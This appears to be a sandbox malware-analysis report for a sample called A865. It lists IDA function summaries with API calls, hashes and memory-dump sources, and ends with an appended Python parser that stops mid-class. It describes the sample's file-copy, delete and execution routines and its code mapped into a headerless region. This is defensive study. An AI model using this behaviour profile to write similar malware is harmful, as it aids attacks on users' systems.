                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy
                                                            • String ID: `_A
                                                            • API String ID: 3722407311-2339250863
                                                            • Opcode ID: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                            • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                                            • Opcode Fuzzy Hash: ad8dc5e93b182d36aa8816b13cb8526b02303e3c68790e1ea0db99ee73ed39a9
                                                            • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                                            APIs
                                                            • StrCmpCA.SHLWAPI(00000000,00876070), ref: 0041079A
                                                            • StrCmpCA.SHLWAPI(00000000,00876170), ref: 00410866
                                                            • StrCmpCA.SHLWAPI(00000000,00876120), ref: 0041099D
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy
                                                            • String ID: `_A
                                                            • API String ID: 3722407311-2339250863
                                                            • Opcode ID: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                            • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                                            • Opcode Fuzzy Hash: 4f314794acc433d264edb91db9a4cba44b198df7345ecddf4fe998b3cfc938e1
                                                            • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                                            • ExitProcess.KERNEL32 ref: 00416755
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                            • String ID: <
                                                            • API String ID: 1148417306-4251816714
                                                            • Opcode ID: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                            • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                                            • Opcode Fuzzy Hash: 5c242e9f6f242afdfd3d50008aa43d31dcc14585de71cbfc0ed53ce080c09176
                                                            • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 022E68CA
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 022E698D
                                                            • ExitProcess.KERNEL32 ref: 022E69BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                            • String ID: <
                                                            • API String ID: 1148417306-4251816714
                                                            • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                            • Instruction ID: e6fa43c86ec8a3706e9b48f3db0c3aa47226030db677f92b72f282516cf51e06
                                                            • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                                            • Instruction Fuzzy Hash: AB3149B1911308ABDB14EFD0DD85FEEB77AAF54300F805189E206A6194DF746B88CF69
                                                            APIs
                                                            • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID: @Jn@$Jn@$Jn@
                                                            • API String ID: 544645111-1180188686
                                                            • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                                            • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                                                            • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                                            • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                                                            APIs
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                            • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcatlstrcpy
                                                            • String ID: vI@$vI@
                                                            • API String ID: 3905823039-1245421781
                                                            • Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                            • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                                            • Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                                                            • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                            • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                            • wsprintfW.USER32 ref: 00418D78
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocProcesswsprintf
                                                            • String ID: %hs
                                                            • API String ID: 659108358-2783943728
                                                            • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                            • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                                            • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                                            • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00845370,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                                            • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                                            • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                            • String ID:
                                                            • API String ID: 257331557-0
                                                            • Opcode ID: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                            • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                                            • Opcode Fuzzy Hash: d20ad723e4956a4f5593e547689fc6f06bc1426b2961df15eb96e4f5265ec8e9
                                                            • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022DA548
                                                            • lstrlen.KERNEL32(00000000,00000000), ref: 022DA666
                                                            • lstrlen.KERNEL32(00000000), ref: 022DA923
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022DA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022DA094
                                                            • DeleteFileA.KERNEL32(00000000), ref: 022DA9AA
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                                            • String ID:
                                                            • API String ID: 257331557-0
                                                            • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                            • Instruction ID: b6c79350879f92eb4bb8617f3476c8bb7e2aa6d8e1f8e73475853970a2f51dcd
                                                            • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                                                            • Instruction Fuzzy Hash: 75E1BD729203189BCF19EBE4DD91DEEB33AAF64300F908159E157B2194EF346A48DF61
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00845370,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                                            • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                                            • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                            • String ID:
                                                            • API String ID: 211194620-0
                                                            • Opcode ID: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                                            • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                                            • Opcode Fuzzy Hash: 51504f8183e0b2e6ebec12441f0f26ba584a9b89164c583ff874fdf13874234a
                                                            • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022DD6E8
                                                            • lstrlen.KERNEL32(00000000), ref: 022DD8FF
                                                            • lstrlen.KERNEL32(00000000), ref: 022DD913
                                                            • DeleteFileA.KERNEL32(00000000), ref: 022DD992
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                            • String ID:
                                                            • API String ID: 211194620-0
                                                            • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                            • Instruction ID: 1b38d02df0154e398d0f8ec03b1e638ba83fe65b8f900dc65c0bee5badce6b20
                                                            • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                                            • Instruction Fuzzy Hash: FD91CB72920318ABCF18EBE4DD95DFE733AAF64300F904169E507A6194EF346A48DF61
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                              • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00845370,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                                            • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                                            • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                            • String ID:
                                                            • API String ID: 211194620-0
                                                            • Opcode ID: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                                            • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                                                            • Opcode Fuzzy Hash: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                                                            • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022DDA68
                                                            • lstrlen.KERNEL32(00000000), ref: 022DDC06
                                                            • lstrlen.KERNEL32(00000000), ref: 022DDC1A
                                                            • DeleteFileA.KERNEL32(00000000), ref: 022DDC99
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                            • String ID:
                                                            • API String ID: 211194620-0
                                                            • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                            • Instruction ID: 626f399f4d31656a7ebd68aae58d7b6b7cbd2d2cd3e1c2ec287d66d2709a4b82
                                                            • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                                                            • Instruction Fuzzy Hash: 8F81CA72920318ABCF08EBE4DD95DEE733AAF64300F90456DE107A6194EF346A48DF61
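The function summaries above repeat the same API String ID in two memory dump sources: the PE-backed image at 0x400000 and the region at 0x22D0000 that Joe Sandbox reports with no PE header. The following Python parser is an added example and is not part of the Joe Sandbox report or its tooling. It reads the plain-text summary blocks, extracts each block's direct and nested API calls with their call-site addresses, dump base and API String ID, pairs blocks that share an API String ID across the PE-backed and non-PE regions, and checks whether every call site moved by the same RVA shift. For the CopyFileA/lstrlen/DeleteFileA routine above the shift is 0x267 for every call, which is what a copy of the same code displaced by a fixed amount looks like; a varying shift would mean the two blocks are different code that happens to call the same APIs. The sample input is the two blocks for that routine copied from the report, with the nested subcall lines shortened to one per block. The API-name normalisation (matching lstrlenA in one dump to lstrlen in the other) and the copy-then-delete check are conventions of this example, not of the report.

```python
"""Parse Joe Sandbox 'APIs' function summaries and pair one routine across dump regions.

Added example; not part of the Joe Sandbox report. Works on the plain-text summary
blocks the report prints for each analysed function.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample: two blocks copied from the report. The first is from the PE-backed
# dump at 0x400000, the second from the region at 0x22D0000 that has no PE header.
# Nested "Part of subcall" lines are shortened to one per block.
SAMPLE = """\
APIs
  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
• lstrlenA.KERNEL32(00000000), ref: 0040D698
• lstrlenA.KERNEL32(00000000), ref: 0040D6AC
• DeleteFileA.KERNEL32(00000000), ref: 0040D72B
Memory Dump Source
• Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Similarity
• API String ID: 211194620-0
APIs
  • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022DD6E8
• lstrlen.KERNEL32(00000000), ref: 022DD8FF
• lstrlen.KERNEL32(00000000), ref: 022DD913
• DeleteFileA.KERNEL32(00000000), ref: 022DD992
Memory Dump Source
• Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
Similarity
• API String ID: 211194620-0
"""

# "• [Part of subcall function ADDR: ]Api.MODULE[(args)], ref: ADDR" (args are optional:
# the report prints e.g. "wsprintfW.USER32 ref: 00418D78" without a parameter list).
CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
SOURCE_RE = re.compile(r"Offset:\s*(?P<off>[0-9A-Fa-f]{8}),\s*based on PE:\s*(?P<pe>true|false)")
APISTR_RE = re.compile(r"API String ID:\s*(?P<id>\S+)")


def normalise(api: str) -> str:
    """Drop a trailing ANSI/Unicode suffix so 'lstrlenA' in one dump matches 'lstrlen' in the other."""
    return api[:-1] if len(api) > 1 and api[-1] in "AW" else api


@dataclass
class Call:
    api: str
    module: str
    ref: int                    # absolute address of the call site in the dump
    subcall_of: Optional[int]   # helper the call belongs to; None for the routine's own calls


@dataclass
class FuncSummary:
    base: int = 0
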